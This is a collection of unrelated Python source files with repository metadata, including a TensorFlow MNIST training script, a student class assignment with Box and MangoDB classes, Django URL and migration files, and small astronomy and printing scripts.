    for basketno in range(hwo.number_of_baskets):
        no = basketno +1
        print "Tool for basket %d is: %d" % (no, hwo.tool_for_basket(no))
| [
"martin.savko@gmail.com"
] | martin.savko@gmail.com |
0b4cc930a2d642e1a36e2008dc5158cca775a7ef | 681bd5e9f451dab637c6831a0eee7185851bb967 | /test/5_2.py | 2a9425d56167e89c573e436316a91e1bf1a8b3d1 | [] | no_license | facingwaller/deeplearning | 86796d02ab0e63ec2bdf3a809a6575f93dc11471 | 2b4ada86a2770b25d2c12b80062998557e993cea | refs/heads/master | 2018-12-04T18:09:28.929223 | 2018-11-09T09:40:19 | 2018-11-09T09:40:19 | 111,788,630 | 10 | 3 | null | null | null | null | UTF-8 | Python | false | false | 8,069 | py | # coding=utf-8
# 在MNIST 数据集上实现神经网络
# 包含一个隐层
# 5种优化方案:激活函数,多层隐层,指数衰减的学习率,正则化损失,滑动平均模型
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# Network and training hyperparameters
INPUT_NODE = 784
OUTPUT_NODE = 10
LAYER1_NODE = 500
BATCH_SIZE = 100
# Base learning rate; decayed exponentially during training
LEARNING_RATE_BASE = 0.8
# Decay rate of the exponential learning-rate schedule
LEARNING_RATE_DECAY = 0.99
# Coefficient of the L2 regularization loss
LAMADA = 0.0001
# Number of training steps
TRAINING_STEPS = 30000
# Decay rate of the moving-average model
MOVING_AVERAGE_DECAY = 0.99
# Create a weight variable and register its L2 penalty in the 'losses' collection
def get_weight(shape, Lamada):
    """Return a truncated-normal weight Variable of *shape*.

    When *Lamada* is given, the weight's L2 regularization term (scaled by
    Lamada) is added to the 'losses' collection.
    """
    weights = tf.Variable(tf.truncated_normal(shape, stddev=0.1))
    if Lamada is not None:
        penalty = tf.contrib.layers.l2_regularizer(Lamada)(weights)
        tf.add_to_collection('losses', penalty)
    return weights
# Forward pass of the network, in two flavors: with and without moving averages.
# ReLU provides the non-linearity; passing an average class lets evaluation
# read the moving-average (shadow) values of the parameters.
def inference(input_tensor, avg_class, weights1, biases1, weights2, biases2):
    """Return the output-layer logits for *input_tensor*.

    avg_class -- None for the plain forward pass, or an
    ExponentialMovingAverage whose .average() supplies shadow variables.
    """
    if avg_class == None:
        layer1 = tf.nn.relu(tf.matmul(input_tensor, weights1) + biases1)
        # No softmax here: the loss op applies softmax itself, and since
        # prediction only compares relative logit magnitudes, omitting the
        # softmax layer does not change the final result.
        return tf.matmul(layer1, weights2) + biases2
    else:
        # Read the shadow (moving-average) values via avg_class.average()
        # before computing the forward pass.
        layer1 = tf.nn.relu(
            tf.matmul(input_tensor, avg_class.average(weights1)) + avg_class.average(biases1))
        return tf.matmul(layer1, avg_class.average(weights2)) + avg_class.average(biases2)
# The training procedure
def train(mnist):
    """Build the two-layer network and train it on *mnist*.

    Uses L2 regularization, an exponentially decaying learning rate and a
    moving-average model for evaluation; prints loss/accuracy periodically.
    """
    x = tf.placeholder(tf.float32, shape=(None, INPUT_NODE), name='x_input')
    y_ = tf.placeholder(tf.float32, shape=(None, OUTPUT_NODE), name='y_input')
    # hidden-layer parameters
    weights1 = get_weight([INPUT_NODE, LAYER1_NODE], LAMADA)
    biaes1 = tf.Variable(tf.constant(0.1, shape=[LAYER1_NODE]))
    # output-layer parameters
    weights2 = get_weight([LAYER1_NODE, OUTPUT_NODE], LAMADA)
    biaes2 = tf.Variable(tf.constant(0.1, shape=[OUTPUT_NODE]))
    # forward pass without the moving-average class (avg_class is None)
    y = inference(x, None, weights1, biaes1, weights2, biaes2)
    # step counter; explicitly not trainable
    global_step = tf.Variable(0, trainable=False)
    # moving-average class; providing global_step speeds up early updates
    variable_averages = tf.train.ExponentialMovingAverage(MOVING_AVERAGE_DECAY, global_step)
    # applying the averages maintains a shadow variable for every trainable one
    variable_averages_op = variable_averages.apply(tf.trainable_variables())
    # forward pass that reads the shadow (moving-average) variables;
    # used for evaluation, obtained explicitly through average()
    average_y = inference(x, variable_averages, weights1, biaes1, weights2, biaes2)
    # sparse softmax cross entropy (faster when there is one correct class);
    # labels are class indices, hence the argmax over the one-hot answers
    cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y, labels=tf.argmax(y_, 1))
    # mean cross entropy over the batch, added to the losses collection
    cross_entropy_mean = tf.reduce_mean(cross_entropy)
    tf.add_to_collection('losses', cross_entropy_mean)
    # total loss = cross entropy + all L2 regularization terms collected above
    loss = tf.add_n(tf.get_collection('losses'))
    # exponentially decaying learning rate
    learning_rate = tf.train.exponential_decay(LEARNING_RATE_BASE,  # base rate, decayed from here
                                               global_step,  # current training step
                                               mnist.train.num_examples / BATCH_SIZE,  # steps per epoch
                                               LEARNING_RATE_DECAY)  # decay rate
    # plain gradient descent on the regularized loss
    train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss, global_step=global_step)
    # each step must both update the parameters and refresh the moving
    # averages; this grouping is equivalent to
    # train_op = tf.group(train_step, variable_averages_op)
    with tf.control_dependencies([train_step, variable_averages_op]):
        train_op = tf.no_op(name='train')
    # accuracy is evaluated on the moving-average forward pass:
    # per-example correctness as booleans...
    correct_prediction = tf.equal(tf.argmax(average_y, 1), tf.argmax(y_, 1))
    # ...cast to floats and averaged to get the accuracy
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    # run the training session
    with tf.Session() as sess:
        tf.global_variables_initializer().run()
        # validation data guides early stopping / progress checks
        validate_feed = {x: mnist.validation.images, y_: mnist.validation.labels}
        # test data is only used for the final quality figure
        test_feed = {x: mnist.test.images, y_: mnist.test.labels}
        # iterative training loop
        for i in range(TRAINING_STEPS):
            xs, ys = mnist.train.next_batch(BATCH_SIZE)
            _, loss_value, step = sess.run([train_op, loss, global_step], feed_dict={x: xs, y_: ys})
            if i % 1000 == 0:
                print("After %d training step(s), loss on training batch is %g." % (step, loss_value))
                validate_acc = sess.run(accuracy, feed_dict=validate_feed)
                print("After %d training step(s),validation accuracy using average model is %g " % (step, validate_acc))
        test_acc = sess.run(accuracy, feed_dict=test_feed)
        print("After %d training step(s) testing accuracy using average model is %g" % (step, test_acc))
def main(argv=None):
    """Download/load the MNIST data and run training."""
    mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
    train(mnist)

if __name__ == '__main__':
    # tf.app.run() parses flags and then invokes main()
    tf.app.run()
| [
"facingwaller@gmail.com"
] | facingwaller@gmail.com |
a40b657ca26e2fccf8461234c2b7bec437955096 | 260ef543772b84896ff7dbf4a536f374e0a5c63b | /03_assignment_final.py | a42ae84b6b4cf98ecc86072b33d76537143b5dd2 | [] | no_license | crarnouts/Python-Work | 47cbebf98db0f2657bb5afd814a1853a2b81fe19 | e896f2cbb41f5a182798cccaa83d45efcf79f3f5 | refs/heads/master | 2020-06-25T03:41:47.802604 | 2019-07-27T16:34:53 | 2019-07-27T16:34:53 | 199,189,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,403 | py | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 17 20:18:47 2019
@author: arnou
"""
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 2 17:10:00 2019
@author: arnou
"""
'''
Assignment #3
1. Add / modify code ONLY between the marked areas (i.e. "Place code below"). Do not modify or add code elsewhere.
2. Run the associated test harness for a basic check on completeness. A successful run of the test cases does not guarantee accuracy or fulfillment of the requirements.
Please do not submit your work if test cases fail.
3. To run unit tests simply use the below command after filling in all of the code:
python 03_assignment.py
4. Unless explicitly stated, please do not import any additional libraries but feel free to use built-in Python packages
5. Submissions must be a Python file and not a notebook file (i.e *.ipynb)
6. Do not use global variables
7. Make sure your work is committed to your master branch in Github
8. Use the test cases to infer requirements wherever feasible
'''
import csv, json, math, pandas as pd, requests, unittest, uuid
# ------ Create your classes here \/ \/ \/ ------
# Box class declaration below here
class Box:
    """A box with private length/width, exposed only through getters.

    The mutating operations (invert, double, combine) change this box in
    place; double and combine additionally return a Box carrying the
    resulting dimensions.
    """

    def __init__(self, length, width):
        # assignment order matters for __str__/__eq__, which expose __dict__
        self.__width__ = width
        self.__length__ = length

    def render(self):
        """Draw the box to stdout as rows of asterisks."""
        for _ in range(self.__length__):
            print('*' * self.__width__)

    def invert(self):
        """Swap length and width."""
        self.__length__, self.__width__ = self.__width__, self.__length__

    def get_area(self):
        """Return length * width."""
        return self.__length__ * self.__width__

    def get_perimeter(self):
        """Return 2 * (length + width)."""
        return 2 * (self.__length__ + self.__width__)

    def get_length(self):
        return self.__length__

    def get_width(self):
        return self.__width__

    def get_hypot(self):
        """Return the length of the diagonal through the middle."""
        return math.hypot(self.__length__, self.__width__)

    def double(self):
        """Double both dimensions; return a Box with the doubled size."""
        self.__length__ *= 2
        self.__width__ *= 2
        return Box(self.__length__, self.__width__)

    def __str__(self):
        return str(self.__dict__)

    def __eq__(self, other):
        # boxes are equal when their lengths and widths match
        return self.__dict__ == other.__dict__

    def print_dim(self):
        """Return a ('length: L', 'width: W') tuple describing this box."""
        return 'length: ' + str(self.__length__), 'width: ' + str(self.__width__)

    def get_dim(self):
        """Return (length, width)."""
        return self.__length__, self.__width__

    def combine(self, other):
        """Grow this box by *other*'s dimensions; return a Box of the new size."""
        self.__length__ += other.__length__
        self.__width__ += other.__width__
        return Box(self.__length__, self.__width__)
# MangoDB class declaration below here
def merge_two_dicts(x, y):
    """Return a new dict with y's entries layered over x's (y wins on clashes)."""
    merged = dict(x)
    merged.update(y)
    return merged
class MangoDB:
    """A tiny in-memory document store: a dict of named collections.

    Instantiation (and wipe) seeds a 'default' collection holding the
    version, db name and a freshly generated uuid4.
    """

    def __init__(self):
        self.collections = {
            'default': {
                'version': 1.0,
                'db': 'mangodb',
                'uuid': str(uuid.uuid4()),
            }
        }

    def display_all_collections(self):
        """Print every collection name followed by its key/value pairs."""
        for name, data in self.collections.items():
            print('collection: ', name)
            for key, value in data.items():
                print(key, value)

    def add_collection(self, collection_name):
        """Create a new, empty collection under *collection_name*."""
        self.collections[collection_name] = {}

    def update_collection(self, collection_name, updates):
        """Merge *updates* into the named collection (updates win on clashes)."""
        merged = dict(self.collections[collection_name])
        merged.update(updates)
        self.collections[collection_name] = merged

    def remove_collections(self, collection_name):
        """Delete the named collection and its data."""
        del self.collections[collection_name]

    def get_collection_names(self):
        """Return the collection names as a list."""
        return list(self.collections)

    def list_collections(self):
        """Print the list of collection names."""
        print(list(self.collections))

    def get_collection_size(self, collection_name):
        """Return the number of key/value pairs in the named collection."""
        return len(self.collections[collection_name])

    def to_json(self, collection_name):
        """Serialize the named collection to a JSON string."""
        return json.dumps(self.collections[collection_name])

    def wipe(self):
        """Reset the db to a single fresh 'default' collection."""
        self.collections = {
            'default': {
                'version': 1.0,
                'db': 'mangodb',
                'uuid': str(uuid.uuid4()),
            }
        }
        return self.collections
# ------ Create your classes here /\ /\ /\ ------
def exercise01():
    '''
    Exercise the Box class: build three boxes (5x10, 3x4, 5x10), show their
    dimensions, compare box1 with the others, combine box3 and a doubled
    box2 into box1, print box2's dimension tuple, compute box2's diagonal,
    and return (box1, box2, box3).
    '''

    # ------ Place code below here \/ \/ \/ ------
    box1, box2, box3 = Box(5, 10), Box(3, 4), Box(5, 10)

    for box in (box1, box2, box3):
        box.print_dim()

    _ = box1 == box2
    _ = box1 == box3

    box1.combine(box3)
    box2.double()
    box1.combine(box2)

    for dimension in box2.get_dim():
        print(dimension)

    box2.get_hypot()

    return box1, box2, box3

    # ------ Place code above here /\ /\ /\ ------
def exercise02():
    '''
    Exercise MangoDB: create a db, add a 'testscores' collection populated
    from test_scores (keys 0..n-1), print its size and the collection list,
    print the db uuid, wipe the db, then print the new uuid to confirm it
    changed.
    '''
    test_scores = [99,89,88,75,66,92,75,94,88,87,88,68,52]
    # ------ Place code below here \/ \/ \/ ------
    db = MangoDB()
    db.add_collection('testscores')
    # sequential integer keys for each score
    db.update_collection('testscores', dict(enumerate(test_scores)))
    print(db.get_collection_size('testscores'))
    db.list_collections()
    # show the uuid before and after wiping to confirm it is regenerated
    print(db.collections['default']['uuid'])
    db.wipe()
    print(db.collections['default']['uuid'])

    # ------ Place code above here /\ /\ /\ ------
def exercise03():
    '''
    1. Avocado toast is expensive but enormously yummy. What's going on with avocado prices? Read about avocado prices (https://www.kaggle.com/neuromusic/avocado-prices/home)
    2. Load the avocado.csv file included in this Githb repository and display every line to the screen
    3. Open the file name under csv_file
    4. The reader should be named reader
    5. Use only the imported csv library to read and print out the avacodo file
    '''

    # ------ Place code below here \/ \/ \/ ------
    # 'csv' is imported at module level, so the redundant local import was
    # removed; the reader is named 'reader' as required by the spec above.
    with open('avocado.csv', 'r') as csv_file:
        reader = csv.reader(csv_file)
        for line in reader:
            print(line)

    # ------ Place code above here /\ /\ /\ ------
class TestAssignment3(unittest.TestCase):
    """Black-box checks for exercises 1-3, provided by the assignment."""

    def test_exercise01(self):
        # Box state after exercise01's combine/double sequence, plus
        # direct checks on double/get_dim/combine semantics.
        print('Testing exercise 1')
        b1, b2, b3 = exercise01()
        self.assertEqual(b1.get_length(),16)
        self.assertEqual(b1.get_width(),28)
        self.assertTrue(b1==Box(16,28))
        self.assertEqual(b2.get_length(),6)
        self.assertEqual(b2.get_width(),8)
        self.assertEqual(b3.get_length(),5)
        self.assertEqual(b2.get_hypot(),10)
        self.assertEqual(b1.double().get_length(),32)
        self.assertEqual(b1.double().get_width(),112)
        self.assertTrue(6 in b2.get_dim())
        self.assertTrue(8 in b2.get_dim())
        self.assertTrue(b2.combine(Box(1,1))==Box(7,9))

    def test_exercise02(self):
        # MangoDB lifecycle: default collection, add/update, JSON, wipe.
        print('Testing exercise 2')
        exercise02()
        db = MangoDB()
        self.assertEqual(db.get_collection_size('default'),3)
        self.assertEqual(len(db.get_collection_names()),1)
        self.assertTrue('default' in db.get_collection_names() )
        db.add_collection('temperatures')
        self.assertTrue('temperatures' in db.get_collection_names() )
        self.assertEqual(len(db.get_collection_names()),2)
        db.update_collection('temperatures',{1:50})
        db.update_collection('temperatures',{2:100})
        self.assertEqual(db.get_collection_size('temperatures'),2)
        self.assertTrue(type(db.to_json('temperatures')) is str)
        self.assertEqual(db.to_json('temperatures'),'{"1": 50, "2": 100}')
        db.wipe()
        self.assertEqual(db.get_collection_size('default'),3)
        self.assertEqual(len(db.get_collection_names()),1)

    def test_exercise03(self):
        # exercise03 only prints the CSV; just make sure it runs.
        print('Exercise 3 not tested')
        exercise03()

if __name__ == '__main__':
    unittest.main()
"noreply@github.com"
] | crarnouts.noreply@github.com |
8bd8256fe811d3a65f35687124d1067ba57c6994 | bf67925b10ed518bf54d8261dd91b382d6aea68a | /groups/urls.py | 099f3b9341c9878d1fffda1f29dc50e0e606cbcf | [] | no_license | AmiiiGen/Social-Media-Site | 421a8f8fdb7202823935ccf86370d77b93242553 | 46aab91b8335e599e357eef5ac6573d911e16eb4 | refs/heads/master | 2023-04-25T03:59:10.579064 | 2021-05-14T09:30:44 | 2021-05-14T09:34:07 | 366,080,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 515 | py | from django.urls import path
from . import views
app_name = 'groups'
urlpatterns = [
path('', views.ListGroups.as_view(), name='all'),
path('new/', views.CreateGroup.as_view(), name='create'),
path('posts/in/<slug:slug>/', views.SingleGroup.as_view(), name='single'),
# url(r'posts/in/(/?P<slug>[\w-]+)', views.SingleGroup.as_view(), name='single'),
path('join/<slug:slug>/', views.JoinGroup.as_view(), name='join'),
path('leave/<slug:slug>/', views.LeaveGroup.as_view(), name='leave'),
]
| [
"amin.sheikhi93@gmail.com"
] | amin.sheikhi93@gmail.com |
3ab9db8026970ae5a27e3ccda794e6daf37b292b | bc23abef788b3f40950565baea8a8afe6ac7ed5a | /Unit4CLab/Unit4CLab.py | 98ae18389aab85b2d339a309e03cd480c9ac3eca | [] | no_license | 19doughertyjoseph/josephdougherty-python | 502c2c46676545b4db217fc71896c4da526d11b1 | 097584b582d013c5c5899efbf058c3aeb7d40b8d | refs/heads/master | 2020-03-28T02:14:13.263200 | 2019-01-17T17:17:25 | 2019-01-17T17:17:25 | 147,557,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | def main():
draw7()
starsAndStripes()
incTriangle()
def draw7():
    """Print a 7x7 square of asterisks."""
    # String repetition replaces the original character-by-character
    # accumulation, whose inner loop also shadowed the outer loop variable.
    for _ in range(7):
        print("*" * 7)
def starsAndStripes():
    """Print three pairs of rows: 7 asterisks, then 7 dashes."""
    # String repetition replaces the original per-character accumulation
    # (whose inner loop shadowed the outer loop variable).
    for _ in range(3):
        print("*" * 7)
        print("-" * 7)
def incTriangle():
    """Print rows 1..7 where row i is the digit i repeated i times."""
    # str(i) * i replaces the inner print-with-end="" loop.
    for i in range(1, 8):
        print(str(i) * i)
main()
| [
"19hymangabrielle@bprep.org"
] | 19hymangabrielle@bprep.org |
ad5d1b7bda9bd683170c32f6da305b9a691513ef | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/ec_14270-1828/sdB_ec_14270-1828_lc.py | bdc07f94a156888a89f067ad64026758d3d61ea9 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | from gPhoton.gAperture import gAperture
def main():
    """Run gPhoton NUV aperture photometry for sdB EC 14270-1828.

    Writes a 30 s-binned light curve CSV; aperture radius and background
    annulus are given in degrees.
    """
    gAperture(band="NUV", skypos=[217.450125,-18.693147], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_ec_14270-1828/sdB_ec_14270-1828_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)

if __name__ == "__main__":
    main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
6cbe9bca7c27a931f4643048634e863bfdd5c383 | b1289970ac93a2f5c36779049e372b3d18a99573 | /src/main/python/model_accuracy.py | 076aac57ebd54873c20f3d82a89018e85ce7bcfb | [] | no_license | NajibMAHJOUBI/world_cup_2018 | b0beddc19ec8c2798eee6baaaa11cb2a0040cb8f | cf8f733ddf59cf3c4776ab30b64e5e0caa7faa89 | refs/heads/master | 2021-01-25T11:33:23.886656 | 2018-06-27T12:48:15 | 2018-06-27T12:48:15 | 123,406,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 603 | py | import os
from model_definition import DefinitionModel
class AccuracyModel(DefinitionModel):
    """Collects accuracy figures for a trained classification model.

    Most methods are still stubs; get_path_prediction builds the path to a
    stage's prediction CSV file.
    """

    def __init__(self, year, model, model_type_, path_prediction):
        # NOTE(review): the parent is initialized with model=None as in the
        # original code -- presumably intentional; verify against
        # DefinitionModel.
        DefinitionModel.__init__(self, year, None, "classification", None, None)
        # BUG FIX: *model* was discarded, yet get_path_prediction needs it.
        self.model = model
        self.model_type_ = model_type_
        self.path_prediction = path_prediction

    def __str__(self):
        # BUG FIX: __str__ returned None (a TypeError whenever str() is
        # called on an instance); return a descriptive string instead.
        return "AccuracyModel(model={0}, model_type={1})".format(self.model, self.model_type_)

    def get_path_prediction(self, stage):
        """Return <path_prediction>/<model_type>/<year>/<stage>/<model>.csv."""
        # BUG FIX: referenced the undefined global name 'model'; use the
        # instance attribute stored in __init__.
        return os.path.join(self.path_prediction, self.model_type_, self.get_year(), stage, self.model + '.csv')

    def append_stages(self):
        pass

    def save_accuracy(self):
        pass
| [
"najib.mahjoubi@gmail.com"
] | najib.mahjoubi@gmail.com |
479c0c2c3846e0dbd095118519a381fdb9848cfc | d3f0698c9df956c7028432102e88e282232aa9ca | /bookshelf/migrations/0014_auto_20200504_1749.py | 55d20375293db9639f71864c30de7c2175804a5f | [] | no_license | aaaaasv/library | 224582cd63246020ee4ce28feffa53070c71356b | 08b79803a8cd91e1187ee6dac0131e644d5b2b1a | refs/heads/master | 2023-03-27T01:29:00.251923 | 2021-04-01T14:30:00 | 2021-04-01T14:30:00 | 255,107,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | # Generated by Django 3.0.3 on 2020-05-04 14:49
from django.conf import settings
from django.db import migrations
import sortedm2m.fields
from sortedm2m.operations import AlterSortedManyToManyField
class Migration(migrations.Migration):
    """Convert PaperBook.reserver to a SortedManyToManyField (sortedm2m)."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('bookshelf', '0013_auto_20200502_1159'),
    ]

    operations = [
        # sortedm2m's custom operation: alters the M2M while preserving rows
        AlterSortedManyToManyField(
            model_name='paperbook',
            name='reserver',
            field=sortedm2m.fields.SortedManyToManyField(blank=True, help_text=None, related_name='reserverOfBook', to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"aaaaasv@users.noreply.github.com"
] | aaaaasv@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.